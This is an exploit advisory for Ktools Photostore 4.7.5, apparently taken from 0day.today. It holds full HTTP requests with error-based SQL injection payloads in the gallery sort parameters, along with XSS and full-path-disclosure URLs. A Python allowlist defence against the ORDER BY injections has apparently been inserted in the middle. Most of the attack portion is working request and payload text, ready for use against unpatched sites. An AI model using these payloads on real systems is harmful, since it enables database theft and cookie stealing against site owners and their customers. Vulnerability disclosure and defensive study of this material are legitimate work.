Ktools Photostore 4.7.5 - Multiple Vulnerabilities

Author: Yakir Wizman
Published: Jul 04, 2016 (0day.today, 1337DAY-ID-25156)
Category: Exploit for php platform in category web applications

#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
# Ktools Photostore <= 4.7.5 Multiple Vulnerabilities
# Bug discovered by Yakir Wizman
# Date 01/07/2016
# Affected versions prior to 4.7.5
# Vendor Homepage - http://www.ktools.net
 
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
#       Author will be not responsible for any damage.
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
# About the Application:
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
# PhotoStore is a professional photo gallery & shopping cart software which contains the following basic features, as described below:
#
#   Sell various sizes or formats of the same photo.
#   Sell photos, vector art, zip files and more.
#   Sell videos (PhotoStore Pro only).
#   Sell prints, artwork, products, packages, digital collections and more.
#   Built in shopping cart and ecommerce system to accept credit cards and/or check payments.
#   Email notifications to both you and the customer upon purchase.
#   Customers can instantly download their files after payment.
#   Connects to PayPal and 2Checkout.
#   Built in credit system to allow your customers to buy credits.
#   Allow your members to upload and sell their photos and other media while you take a commission.
  
# The vulnerabilities described below do not require any legitimate user account to exploit them.
# The Photostore application is prone to multiple vulnerabilities, such as SQL Injection and Cross Site Scripting, and exploiting them does not require any legitimate user or admin privilege.
# A potential attacker can exploit these vulnerabilities to retrieve all the data stored in the application's database (in the case of the SQL Injection vulnerability) or to carry out cookie stealing / phishing attacks (in the case of the Cross Site Scripting vulnerability).
 
 
 
# SQL Injection (error based) Proof-Of-Concept
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
# SQL Injection (Severity is Critical)
# The vulnerable parameter is “gallerySortType”, which is not sanitized and is sent by the user to retrieve the gallery objects ordered ASC or DESC in the SQL query.
# Request Data #1 is:
 
POST /photostore/gallery/Objects/24/page1/ HTTP/1.1
Cache-Control: no-cache
Referer: http://www.example.net/photostore/gallery/Objects/24/page1/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Language: en-us,en;q=0.5
Host: www.ktoolsdemos.net
Cookie: PHPSESSID=3eef92499b2e80b0efae88f4d99e5ffe; cart[uniqueOrderID]=F844D7C9C7B2EA3806E501D476D3BF6E; member[umem_id]=C4A01DFEB29A64F53261C12F0F017E90; 09584=eccbc87e4b5ce2fe28308fd9f2a7baf3; pass_4647=eccbc87e4b5ce2fe28308fd9f2a7baf3
Accept-Encoding: gzip, deflate
Content-Length: 221
Content-Type: application/x-www-form-urlencoded
 
postGalleryForm=1&gallerySortBy=media_id&gallerySortType=asc,[SQL_PAYLOAD]
 
# Inserted payload for example:
postGalleryForm=1&gallerySortBy=media_id&gallerySortType=asc,(SELECT 9713 FROM(SELECT COUNT(*),CONCAT(0x71716b6b71,(SELECT (ELT(9713=9713,1))),0x7178717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
 
###
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
###
# The vulnerable parameter is “gallerySortBy”, which is not sanitized and is sent by the user to select the column by which the gallery objects are sorted in the SQL query.
# Request Data #2 is:
 
POST /photostore/gallery/Objects/24/page1/ HTTP/1.1
Cache-Control: no-cache
Referer: http://server/photostore/gallery/Objects/24/page1/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Language: en-us,en;q=0.5
Host: server
Cookie: PHPSESSID=3eef92499b2e80b0efae88f4d99e5ffe; cart[uniqueOrderID]=F844D7C9C7B2EA3806E501D476D3BF6E; member[umem_id]=C4A01DFEB29A64F53261C12F0F017E90; 09584=eccbc87e4b5ce2fe28308fd9f2a7baf3; pass_4647=eccbc87e4b5ce2fe28308fd9f2a7baf3
Accept-Encoding: gzip, deflate
Content-Length: 57
Content-Type: application/x-www-form-urlencoded
 
postGalleryForm=1&gallerySortBy=id[SQL_PAYLOAD]&gallerySortType=asc
 
# Inserted payload for example:
postGalleryForm=1&gallerySortBy=id AND (SELECT 7522 FROM(SELECT COUNT(*),CONCAT(0x7176787871,(SELECT (ELT(7522=7522,1))),0x716a717871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&gallerySortType=asc
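A defensive counterpart to the two ORDER BY injections above, added here as an example and not code from the advisory or from Photostore: because ORDER BY columns and directions cannot be bound as prepared-statement parameters, the handler maps gallerySortBy and gallerySortType through an exact-match allowlist and rejects anything else. The column names and table alias are assumed; the sample bodies are a constructed legitimate request and the advisory's Request Data #1 body.

```python
from urllib.parse import parse_qs

# Allowlist mapping the sort tokens a client may send to the column expression
# placed in the query. Column names are assumed for this example; Photostore's
# real schema is not on the page.
SORT_COLUMNS = {"media_id": "m.media_id", "id": "m.id", "title": "m.title"}
SORT_TYPES = {"asc": "ASC", "desc": "DESC"}

class InvalidSortParameter(ValueError):
    """A sort parameter was not exactly one of the allowlisted tokens."""

def build_order_by(sort_by: str, sort_type: str) -> str:
    """Return an ORDER BY clause built only from allowlisted tokens.

    ORDER BY identifiers and directions cannot be bound as prepared-statement
    parameters, so the value is never cleaned or escaped: it is looked up and
    rejected on any mismatch, which keeps "asc,(SELECT ..." and
    "id AND (SELECT ..." out of the query text entirely.
    """
    try:
        column = SORT_COLUMNS[sort_by]
        direction = SORT_TYPES[sort_type.lower()]
    except KeyError as exc:
        raise InvalidSortParameter(f"rejected sort token: {exc.args[0]!r}") from None
    return f"ORDER BY {column} {direction}"

def gallery_order_by(body: str) -> str:
    """Parse an x-www-form-urlencoded gallery form body and build its clause."""
    params = parse_qs(body, keep_blank_values=True)
    sort_by = params.get("gallerySortBy", ["media_id"])[0]
    sort_type = params.get("gallerySortType", ["asc"])[0]
    return build_order_by(sort_by, sort_type)

def gallery_request_accepted(body: str) -> bool:
    """True if the body's sort parameters pass the allowlist, else False."""
    try:
        gallery_order_by(body)
        return True
    except InvalidSortParameter:
        return False

# Sample bodies: a constructed legitimate request, then the injected body from
# the advisory's Request Data #1 (gallerySortType carries the payload).
LEGIT_BODY = "postGalleryForm=1&gallerySortBy=media_id&gallerySortType=desc"
PAYLOAD_BODY = ("postGalleryForm=1&gallerySortBy=media_id&gallerySortType=asc,"
                "(SELECT 9713 FROM(SELECT COUNT(*),CONCAT(0x71716b6b71,(SELECT (ELT(9713=9713,1))),"
                "0x7178717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)")
```

Because the lookup is exact-match, a missing parameter falls back to the server-side default rather than to whatever the client sent, and the user string itself never appears in the query.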
 
 
 
# Cross Site Scripting Proof-Of-Concept
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
# XSS (Severity is Medium)
# The vulnerable parameters are “mediaID” in the “workbox.php” file and “password” in the “/mgr.login.php” file, which are not sanitized and are sent by the user to the application.
#
# In order to exploit this vulnerability, the URL should be like the following examples:
#
# http://server/photostore/workbox.php?mode=addToLightbox&mediaID="><script>alert(/XSS/)</script>
# http://server/photostore/manager/mgr.login.php?username=demo&password='><script>alert("XSS")</script><input type='hidden
 
 
# Full path disclosure Proof-Of-Concept
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
# FPD (Severity is low/info)
# The vulnerable parameter is “photoID” in the “productshot.php” file, which is only partially sanitized; therefore an attacker can exploit it only for full path disclosure.
#
# In order to exploit this vulnerability, the URL should be like the following example:
#
# http://server/photostore/productshot.php?itemID=1&itemType=prod&photoID=%2f&size=125

#  0day.today [2018-04-04]  #